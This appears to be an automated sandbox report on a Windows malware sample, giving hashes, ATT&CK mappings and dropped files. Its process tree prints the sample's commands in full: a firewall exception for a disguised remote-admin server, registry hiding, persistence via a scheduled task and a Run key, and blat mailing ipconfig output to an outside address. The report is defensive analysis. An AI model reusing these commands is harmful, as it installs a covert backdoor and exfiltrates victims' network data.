94d541e0b87e610a71aeec6f8ffa07b9007612f65233ed78ac16cffda98e05e3

Analysis

max time kernel
120s
max time network
124s
platform
windows7_x64
resource
win7-20231215-en
resource tags

arch:x64arch:x86image:win7-20231215-enlocale:en-usos:windows7-x64system
submitted
26/12/2023, 15:41

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

79b1d9fa564a09c901a738dc23e5a409.exe
Size

405KB
MD5

79b1d9fa564a09c901a738dc23e5a409
SHA1

eadbc4f609b6b073519664660527d77a2f1c1b06
SHA256

94d541e0b87e610a71aeec6f8ffa07b9007612f65233ed78ac16cffda98e05e3
SHA512

3a3ba57c5626d22dad4a507b178a5b80798a89bff7706113968995bc3d4e20d90d6d48776ea3419459cded77861bdbd37265b426b96a53f9a3621570fb22c565
SSDEEP

6144:TbXE9OiTGfhEClq97Q9+L7cWSUezPknw5zsQu0M7hA37E1L42Yz4UFGbjKfm8fpC:fU9Xiuim30zmGVVM7hAonZhyX4CmD

Score

8^/10

evasion

Malware Config

Signatures

Modifies Windows Firewall 1 TTPs 1 IoCs

evasion

Windows Service

T1543.003

pid	Process
2208	netsh.exe

Executes dropped EXE 6 IoCs

pid	Process
2700	cmdow.exe
1008	svchost.exe
1816	svchost.exe
2636	svchost.exe
2808	blat.exe
2024	blat.exe

Loads dropped DLL 2 IoCs

pid	Process
2876	cmd.exe
2876	cmd.exe

Drops file in System32 directory 9 IoCs

description	ioc	Process
File created	C:\Windows\SysWOW64\blat.dll	cmd.exe
File opened for modification	C:\Windows\SysWOW64\blat.dll	cmd.exe
File created	C:\Windows\SysWOW64\install.bat	cmd.exe
File opened for modification	C:\Windows\SysWOW64\install.bat	cmd.exe
File created	C:\Windows\SysWOW64\ip.txt	cmd.exe
File created	C:\Windows\SysWOW64\blat.exe	cmd.exe
File opened for modification	C:\Windows\SysWOW64\blat.exe	cmd.exe
File created	C:\Windows\SysWOW64\blat.lib	cmd.exe
File opened for modification	C:\Windows\SysWOW64\blat.lib	cmd.exe

Drops file in Windows directory 9 IoCs

description	ioc	Process
File opened for modification	C:\Windows\admdll.dll	79b1d9fa564a09c901a738dc23e5a409.exe
File opened for modification	C:\Windows\blat.exe	79b1d9fa564a09c901a738dc23e5a409.exe
File opened for modification	C:\Windows\cmdow.exe	79b1d9fa564a09c901a738dc23e5a409.exe
File opened for modification	C:\Windows\raddrv.dll	79b1d9fa564a09c901a738dc23e5a409.exe
File opened for modification	C:\Windows\svchost.exe	79b1d9fa564a09c901a738dc23e5a409.exe
File opened for modification	C:\Windows\íåëëè.txt	79b1d9fa564a09c901a738dc23e5a409.exe
File opened for modification	C:\Windows\blat.dll	79b1d9fa564a09c901a738dc23e5a409.exe
File opened for modification	C:\Windows\blat.lib	79b1d9fa564a09c901a738dc23e5a409.exe
File opened for modification	C:\Windows\install.bat	79b1d9fa564a09c901a738dc23e5a409.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Creates scheduled task(s) 1 TTPs 1 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task/Job

T1053

pid	Process
2464	schtasks.exe

Gathers network information 2 TTPs 1 IoCs

Uses commandline utility to view network configuration.

System Information Discovery

T1082

Command and Scripting Interpreter

T1059

pid	Process
2020	ipconfig.exe

Modifies registry key 1 TTPs 2 IoCs

Modify Registry

T1112

pid	Process
1728	reg.exe
2744	reg.exe

Suspicious behavior: EnumeratesProcesses 1 IoCs

pid	Process
2700	cmdow.exe

Suspicious use of WriteProcessMemory 51 IoCs

description	pid	Process	procid_target
PID 2248 wrote to memory of 2876	2248	79b1d9fa564a09c901a738dc23e5a409.exe	28
PID 2248 wrote to memory of 2876	2248	79b1d9fa564a09c901a738dc23e5a409.exe	28
PID 2248 wrote to memory of 2876	2248	79b1d9fa564a09c901a738dc23e5a409.exe	28
PID 2248 wrote to memory of 2876	2248	79b1d9fa564a09c901a738dc23e5a409.exe	28
PID 2248 wrote to memory of 2876	2248	79b1d9fa564a09c901a738dc23e5a409.exe	28
PID 2248 wrote to memory of 2876	2248	79b1d9fa564a09c901a738dc23e5a409.exe	28
PID 2248 wrote to memory of 2876	2248	79b1d9fa564a09c901a738dc23e5a409.exe	28
PID 2876 wrote to memory of 2700	2876	cmd.exe	30
PID 2876 wrote to memory of 2700	2876	cmd.exe	30
PID 2876 wrote to memory of 2700	2876	cmd.exe	30
PID 2876 wrote to memory of 2700	2876	cmd.exe	30
PID 2876 wrote to memory of 2208	2876	cmd.exe	32
PID 2876 wrote to memory of 2208	2876	cmd.exe	32
PID 2876 wrote to memory of 2208	2876	cmd.exe	32
PID 2876 wrote to memory of 2208	2876	cmd.exe	32
PID 2876 wrote to memory of 2744	2876	cmd.exe	33
PID 2876 wrote to memory of 2744	2876	cmd.exe	33
PID 2876 wrote to memory of 2744	2876	cmd.exe	33
PID 2876 wrote to memory of 2744	2876	cmd.exe	33
PID 2876 wrote to memory of 1728	2876	cmd.exe	34
PID 2876 wrote to memory of 1728	2876	cmd.exe	34
PID 2876 wrote to memory of 1728	2876	cmd.exe	34
PID 2876 wrote to memory of 1728	2876	cmd.exe	34
PID 2876 wrote to memory of 1008	2876	cmd.exe	35
PID 2876 wrote to memory of 1008	2876	cmd.exe	35
PID 2876 wrote to memory of 1008	2876	cmd.exe	35
PID 2876 wrote to memory of 1008	2876	cmd.exe	35
PID 2876 wrote to memory of 1816	2876	cmd.exe	36
PID 2876 wrote to memory of 1816	2876	cmd.exe	36
PID 2876 wrote to memory of 1816	2876	cmd.exe	36
PID 2876 wrote to memory of 1816	2876	cmd.exe	36
PID 2876 wrote to memory of 2808	2876	cmd.exe	38
PID 2876 wrote to memory of 2808	2876	cmd.exe	38
PID 2876 wrote to memory of 2808	2876	cmd.exe	38
PID 2876 wrote to memory of 2808	2876	cmd.exe	38
PID 2876 wrote to memory of 2020	2876	cmd.exe	39
PID 2876 wrote to memory of 2020	2876	cmd.exe	39
PID 2876 wrote to memory of 2020	2876	cmd.exe	39
PID 2876 wrote to memory of 2020	2876	cmd.exe	39
PID 2876 wrote to memory of 2024	2876	cmd.exe	40
PID 2876 wrote to memory of 2024	2876	cmd.exe	40
PID 2876 wrote to memory of 2024	2876	cmd.exe	40
PID 2876 wrote to memory of 2024	2876	cmd.exe	40
PID 2876 wrote to memory of 2464	2876	cmd.exe	43
PID 2876 wrote to memory of 2464	2876	cmd.exe	43
PID 2876 wrote to memory of 2464	2876	cmd.exe	43
PID 2876 wrote to memory of 2464	2876	cmd.exe	43
PID 2876 wrote to memory of 436	2876	cmd.exe	44
PID 2876 wrote to memory of 436	2876	cmd.exe	44
PID 2876 wrote to memory of 436	2876	cmd.exe	44
PID 2876 wrote to memory of 436	2876	cmd.exe	44

C:\Users\Admin\AppData\Local\Temp\79b1d9fa564a09c901a738dc23e5a409.exe
"C:\Users\Admin\AppData\Local\Temp\79b1d9fa564a09c901a738dc23e5a409.exe"
1⤵
- Drops file in Windows directory
- Suspicious use of WriteProcessMemory
PID:2248
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Windows\install.bat" "
  2⤵
  - Loads dropped DLL
  - Drops file in System32 directory
  - Suspicious use of WriteProcessMemory
  PID:2876
- - C:\Windows\cmdow.exe
    cmdow @ /HID
    3⤵
    - Executes dropped EXE
    - Suspicious behavior: EnumeratesProcesses
    PID:2700
- - C:\Windows\SysWOW64\netsh.exe
    netsh firewall add allowedprogram "C:\Windows\svchost.exe" "Remote Administrator Server" ENABLE
    3⤵
    - Modifies Windows Firewall
    PID:2208
- - C:\Windows\SysWOW64\reg.exe
    REG ADD HKLM\SYSTEM\RAdmin\v2.0\Server\Parameters /v DisableTrayIcon /t REG_BINARY /d 00000001 /f
    3⤵
    - Modifies registry key
    PID:2744
- - C:\Windows\SysWOW64\reg.exe
    REG ADD HKLM\SYSTEM\CurrentControlSet\Services\r_server /v DisplayName /t REG_SZ /d "Service Host Controller" /f
    3⤵
    - Modifies registry key
    PID:1728
- - C:\Windows\svchost.exe
    "C:\Windows/svchost.exe" /install /silence
    3⤵
    - Executes dropped EXE
    PID:1008
- - C:\Windows\svchost.exe
    "C:\Windows/svchost.exe" /start
    3⤵
    - Executes dropped EXE
    PID:1816
- - C:\Windows\SysWOW64\blat.exe
    C:\Windows/system32/blat.exe -install -server smtp.yandex.ru -port 587 -f [email protected] -u sbst3 -pw 199433
    3⤵
    - Executes dropped EXE
    PID:2808
- - C:\Windows\SysWOW64\ipconfig.exe
    ipconfig /all
    3⤵
    - Gathers network information
    PID:2020
- - C:\Windows\blat.exe
    blat.exe C:\Windows/system32/ip.txt -to [email protected].
    3⤵
    - Executes dropped EXE
    PID:2024
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /create /tn "security" /sc minute /mo 15 /ru "NT AUTHORITY\SYSTEM" /tr C:\Windows/system32\ip.bat
    3⤵
    - Creates scheduled task(s)
    PID:2464
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Ru n" /v "install" /t REG_SZ /d "C:\Windows\system32\install.bat" /f
    3⤵
    PID:436

C:\Windows\svchost.exe
"C:\Windows\svchost.exe" /service
1⤵
- Executes dropped EXE
PID:2636

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

Scheduled Task/Job

T1053

Persistence

Create or Modify System Process

T1543

Windows Service

T1543.003

Scheduled Task/Job

T1053

Privilege Escalation

Create or Modify System Process

T1543

Windows Service

T1543.003

Scheduled Task/Job

T1053

Defense Evasion

Modify Registry

T1112

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Windows\SysWOW64\blat.dll

Filesize
120KB

MD5
724cae63522f6e5f7565a3bf4b2a719b

SHA1
18620dbd4357d85918070f669ff4b61755290757

SHA256
b87814eaf1cd5268e797f1119b58e3fd79381af3f530be9a90993198cbce1779

SHA512
af68749cadf9920a8bed455a2557b1faf475d30fdd62f45da6757fbc5a59341fffeccca4ff646b334da95cf673deeeea74bdbb27a16f510a4e3309055f89817d

Download Submit
C:\Windows\SysWOW64\blat.lib

Filesize
2KB

MD5
3cd3cffda2b5108e2778f94429c624d6

SHA1
3e4d218d1b8eb4fa1ab5152b126951892aff3dc9

SHA256
b545194041588fc0a6f57e7eb5a93d2418aaa263d246e3c696a79ee5859770ff

SHA512
c80080afcc982c4e950876756fb32c7f24fbe45bfbbe78afe144be1ede86dc9ef1e57db95d3df7f4c6011fd226f23684b929781b55d1be659cfa75d14f8d0c79

Download Submit
C:\Windows\SysWOW64\ip.txt

Filesize
1KB

MD5
0bb989d5af0a046ee24ded132e1cc534

SHA1
4e32d11df6fb3c7c973e37f5dd41239f09436c49

SHA256
4391f34917540761a30742f25782bd3210c341a1693e04fa31204ea037c600d4

SHA512
2b640561e42862b3dfdbe1fbbe0385835d913cc9572f2d60fabcb99682165acba43227e6febf2fac45b696688b218d6713e5c26bc8e91f7a92b185f7219d062f

Download Submit
C:\Windows\admdll.dll

Filesize
88KB

MD5
c915181e93fe3d4c41b1963180d3c535

SHA1
f35e66bec967d4254338a120eea8159f29c06a99

SHA256
d8fc5d545e684a4d5001004463f762d190bee478eb3a329f65998bad53d3c958

SHA512
2a5ceeb919546a713e172823da75e8f58c98c1dcedfaa7cacbd48af57bcb8da49c6289908c6c2a1bb6bda4cc7fac58adffae4a500dfe0c503397ca9aa8e92e21

Download Submit
C:\Windows\blat.exe

Filesize
112KB

MD5
31f84e433e8d1865e322998a41e6d90e

SHA1
cbea6cda10db869636f57b1cffad39b22e6f7f17

SHA256
aeca4a77d617da84296b5f857b2821333fe4b9663e8df74ef5a25a7882693e5e

SHA512
7ae504723b5b140e45af3163d1bfdc5ee0497debafba07cfbf1d2c15147c000be53f4ac8d36d926ed11cf0bb62e9e72f9bcf5d4caf92aa732d942f55834e2be9

Download Submit
C:\Windows\cmdow.exe

Filesize
30KB

MD5
48a78bf8ef453d9ca4d6c0587ae2de94

SHA1
fdcc71edb09d13165abb106dec95b5376cc05527

SHA256
319390597ae00859d5862aec261584cdb8e6c863c06ac69fecbe374165491756

SHA512
d30ff0df216637f1361fd76a0b18fbfc95f8917e04c2feef504edf57a2056d988d096a1de6189462971cbd718b61bcb7874860a38fd54bebf2970e90b37db11d

Download Submit
C:\Windows\install.bat

Filesize
1KB

MD5
aaad13943fea2367104a679600d6d521

SHA1
d66d093ff44e23dc72742593b7d60cc49f6da785

SHA256
cb6ce0aada73c92104ac9e3ea2f579e7ec8bd39eee0dbae8095907924b1aeada

SHA512
169085c1fcac120d94558f2e185be9f2d2b1f7101fd15c40f22b22b5a095265c40ebbd62691dd6c027ef8313600c5341bb7cf2f3d2b8075197700483dec5d591

Download Submit
C:\Windows\raddrv.dll

Filesize
28KB

MD5
b50d22ab0323cbd0fedfdf4689bc1301

SHA1
efd6ef059fa6ef25791e7ee660d63b05d0c11963

SHA256
970786caf18ef731b0e1a562e7155c7b7fe525fc000c14a6156ac19292922bc0

SHA512
91961bd7fe9744f56a1dde2123d78db428f3d7c1dd0155458a73e822f3073d5221e95cc4441d824b36b556765660ae781282c3c4d95e3a810abf4ff84c0c5bfc

Download Submit
C:\Windows\svchost.exe

Filesize
180KB

MD5
4da2155a683838f6d2ff544437fb76c8

SHA1
45c08891e4f811c3eee4d84474d7ca230b12f4ec

SHA256
0425a758ee783e178f0e3259cd07f7ba41f6fcca1146631636613d247809345b

SHA512
51228f948e8a2e94f8c8b6bf243557f4430003d72a6ae2388b34b60d904e257bab8e7287cc053d86f01e0011994f9007170d227d274f9d0aac6326a1643af54e

Download Submit
memory/1008-59-0x0000000000290000-0x00000000002E7000-memory.dmp

Filesize
348KB

Download
memory/1008-60-0x0000000000290000-0x00000000002E7000-memory.dmp

Filesize
348KB

Download
memory/1816-63-0x0000000000330000-0x0000000000387000-memory.dmp

Filesize
348KB

Download
memory/1816-65-0x0000000000330000-0x0000000000387000-memory.dmp

Filesize
348KB

Download
memory/2248-42-0x0000000000400000-0x000000000042A000-memory.dmp

Filesize
168KB

Download
memory/2636-64-0x0000000000440000-0x0000000000497000-memory.dmp

Filesize
348KB

Download
memory/2636-76-0x0000000000440000-0x0000000000497000-memory.dmp

Filesize
348KB

Download